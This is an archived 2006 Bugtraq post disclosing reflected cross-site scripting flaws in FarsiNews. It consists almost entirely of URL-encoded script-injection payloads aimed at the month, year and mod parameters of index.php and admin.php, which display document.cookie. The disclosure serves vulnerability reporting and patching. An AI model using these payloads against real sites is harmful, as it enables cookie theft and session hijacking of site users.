lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060426050922.824.qmail@securityfocus.com> Date: 26 Apr 2006 05:09:22 -0000 From: outlaw@...a-security.net To: bugtraq@...urityfocus.com Subject: XXS Attack On FarsiNews XSS attack: http://[target]/[farsinews_path ]/index.php?month=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!--&year=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!-- http://[target]/[farsinews_path]/admin.php?mod=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C !-- Original Advisory http://www.aria-security.net/advisory/farsinews/farsinews0420062.txt